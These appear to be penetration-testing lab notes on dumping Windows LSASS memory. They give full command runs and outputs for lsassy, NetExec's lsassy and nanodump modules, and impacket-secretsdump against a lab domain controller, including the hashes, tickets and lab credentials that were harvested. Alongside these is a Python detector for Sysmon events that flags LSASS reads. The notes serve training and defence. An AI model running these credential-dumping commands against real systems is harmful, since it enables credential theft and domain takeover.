LSASS
1. What is LSASS
The Local Security Authority Subsystem Service (LSASS) is a Windows service and system process responsible for enforcing security policy on the system, handling user authentication, and holding sensitive credential material in memory. Only users with administrator privileges can read this material (locally or remotely).
The process keeps several forms of credential data in memory:
- NT hashes
- Kerberos tickets
- Cleartext passwords (if WDigest is enabled, common on older systems)
- DPAPI master keys (used to decrypt keys protected for the user)
- AES keys used for Kerberos
1.1. Why it matters
Unlike attacks on the SAM database, which only yield local account hashes, LSASS memory holds the credentials of every user with an active session on the machine. On a domain controller that means domain admins, service accounts and every domain user who has authenticated recently. LSASS also stores Kerberos tickets, which can be used in pass-the-ticket (PTT) attacks.
1.2. Logon flow
At first logon, LSASS does the following:
- Caches the credentials in local memory
- Creates access tokens (the primary token, in this case)
- Enforces security policy
- Writes to the Windows Security log
2. Dumping LSASS process memory
2.1. Remote dumping
2.1.1. Remote dump with lsassy
lsassy is a Python tool that dumps LSASS memory remotely and parses the credentials directly. It connects over SMB, dumps LSASS using one of several dump methods, retrieves the dump file and parses it locally, all in a single command.
```
┌──(root㉿kali)-[~]
└─# lsassy -u administrator -p Admin123! -d rain.local 192.168.8.110
192.168.8.110 - RAIN\Administrator [NT] 520126a03f5d5a8d836f1c4f34ede7ce | [SHA1] 6ae2130ee55dd7d817c02435f722215d67e9f5bc
192.168.8.110 - RAIN\DC01$ [NT] e24d59dca0277fad1f3c56e943dca8c2 | [SHA1] d9bba2b1cb0f68be5fc8a1978bf8a2b58265359d
192.168.8.110 - rain.local\DC01$ [PWD] 55c8afd242f123b98dc846e4628ff895b7e43888a162fb1b05a29afc4a6431da13d1bea85945b15b144241c4c7ee452d9c4668e2a62a1cb3a490130f75bfbab8ccbe346a9529170b1add346828a159ee1b7f9d95819f983b1e409a737a206294e921d7e0c91f1d95bcd0483f131a9ccdf45cb134db76a6a48576419bb6d894d03948cb4e157f2e378d191d38de13c06a9c9a20ee7b42f5478f5b61267c18cd2c3788d9ed51810c14283e2ec6c7f4ec9239259d956973067151a54488831b072be7c8e1c674371d386db799dbba06c43260c7b6a961516b276b48416033dfba40d3e5407bd05afcf63697506f05ca667c
192.168.8.110 - RAIN.LOCAL\DESKTOP-SAQRM8B$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:45 (TGT_RAIN.LOCAL_DESKTOP-SAQRM8B$_krbtgt_RAIN.LOCAL_59c012a8_20260419194518.kirbi)
192.168.8.110 - RAIN.LOCAL\Administrator [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 23:25 (TGT_RAIN.LOCAL_Administrator_krbtgt_RAIN.LOCAL_2a76f622_20260419232534.kirbi)
192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 20:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_bd427ad5_20260419203027.kirbi)
192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 20:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_16e7a97a_20260419203027.kirbi)
192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_af3cfb1b_20260419193058.kirbi)
192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_736b7135_20260419193058.kirbi)
24 Kerberos tickets written to /root/.config/lsassy/tickets
5 masterkeys saved to /root/.config/lsassy/masterkeys.txt
```
Triggers an alert.
2.1.2. NetExec lsassy module
```
┌──(root㉿kali)-[~]
└─# nxc smb 192.168.8.110 -u administrator -p Admin123! -M lsassy
SMB         192.168.8.110   445    DC01   [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rain.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.8.110   445    DC01   [+] rain.local\administrator:Admin123! (Pwn3d!)
LSASSY      192.168.8.110   445    DC01   Saved 23 Kerberos ticket(s) to /root/.nxc/modules/lsassy
LSASSY      192.168.8.110   445    DC01   RAIN\Administrator 520126a03f5d5a8d836f1c4f34ede7ce
```
Alerts like crazy.
2.1.3. nxc nanodump module
```
┌──(root㉿kali)-[~]
└─# nxc smb 192.168.8.110 -u administrator -p Admin123! -M nanodump
SMB         192.168.8.110   445    DC01   [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rain.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.8.110   445    DC01   [+] rain.local\administrator:Admin123! (Pwn3d!)
NANODUMP    192.168.8.110   445    DC01   [*] 64-bit Windows detected.
NANODUMP    192.168.8.110   445    DC01   [+] Created file nano.exe on the \\C$\Windows\Temp\
NANODUMP    192.168.8.110   445    DC01   [*] Getting LSASS PID via command tasklist /v /fo csv | findstr /i "lsass"
NANODUMP    192.168.8.110   445    DC01   [*] Executing command C:\Windows\Temp\nano.exe --pid 632 --write C:\Windows\Temp\20260419_1015.log
NANODUMP    192.168.8.110   445    DC01   [+] Process lsass.exe was successfully dumped
NANODUMP    192.168.8.110   445    DC01   [*] Copying 20260419_1015.log to host
NANODUMP    192.168.8.110   445    DC01   [+] Dumpfile of lsass.exe was transferred to /tmp/DC01_64_rain.local.log
NANODUMP    192.168.8.110   445    DC01   [+] Deleted nano file on the C$ share
NANODUMP    192.168.8.110   445    DC01   [+] Deleted lsass.dmp file on the C$ share
NANODUMP    192.168.8.110   445    DC01   RAIN\Administrator:520126a03f5d5a8d836f1c4f34ede7ce
```
Nanodump uses indirect syscalls and in-memory manipulation, so it is somewhat quieter.
In testing it only produced a "low" alert.
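The alerts noted in the runs above come from the same telemetry a defender can query directly. As an added example that is not part of the original notes or of any of these tools, the following Python detector runs over constructed Sysmon ProcessAccess and ProcessCreate records and flags the trace the nanodump run leaves: the tasklist | findstr lsass PID lookup, a binary launched from C:\Windows\Temp with a --pid argument, and a handle on lsass.exe with PROCESS_VM_READ. The allowlist and writable-directory list are assumptions to tune per environment.

```python
import re

# Constructed sample records (not real telemetry), shaped like Sysmon events:
# EventID 1 = ProcessCreate, EventID 10 = ProcessAccess. They mirror the steps
# of the nanodump run above: PID lookup, binary in Windows\Temp, lsass handle.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c tasklist /v /fo csv | findstr /i "lsass"'},
    {"EventID": 1, "Image": r"C:\Windows\Temp\nano.exe",
     "CommandLine": r"C:\Windows\Temp\nano.exe --pid 632 --write C:\Windows\Temp\x.log"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\nano.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

# Images that legitimately open lsass.exe; an assumption to be tuned per
# environment (EDR/AV agents, wininit, csrss, ...).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
PROCESS_VM_READ = 0x0010          # required by any minidump-style read of LSASS
WRITABLE_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")
PID_LOOKUP = re.compile(r"tasklist.*\|\s*findstr.*lsass")
PID_ARG = re.compile(r"--pid\s+\d+")

def classify(ev):
    """Return a finding string for a suspicious event, or None if benign."""
    eid = ev.get("EventID")
    if eid == 10 and ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        # Event 10 is produced by a kernel ObRegisterCallbacks callback, so a
        # dumper that avoids user-mode API hooks still generates this record.
        src = ev.get("SourceImage", "").lower()
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        if access & PROCESS_VM_READ and src not in ALLOWED_SOURCES:
            return f"lsass memory read by {src} (GrantedAccess={access:#x})"
    if eid == 1:
        img = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        if PID_LOOKUP.search(cmd):
            return f"lsass PID lookup: {cmd}"
        if img.startswith(WRITABLE_DIRS) and PID_ARG.search(cmd):
            return f"binary from writable dir targeting a PID: {cmd}"
    return None

def scan(events):
    """Run every event through classify() and return the findings in order."""
    return [f for f in (classify(e) for e in events) if f]
```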
2.1.4. impacket-secretsdump
Unlike the tools above, secretsdump does not read LSASS memory: as its output shows, it collects SAM hashes and LSA secrets over the remote registry and, on a domain controller, NTDS.DIT secrets via DRSUAPI.
```
┌──(root㉿kali)-[~]
└─# secretsdump.py 'administrator:Admin123!@192.168.8.110'
Impacket v0.14.0.dev0+20260320.93755.d400a6aa - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xde0854409bbc2e2f887d8e2ffdcc39a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
[*] DefaultPassword
[*] DPAPI_SYSTEM
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
```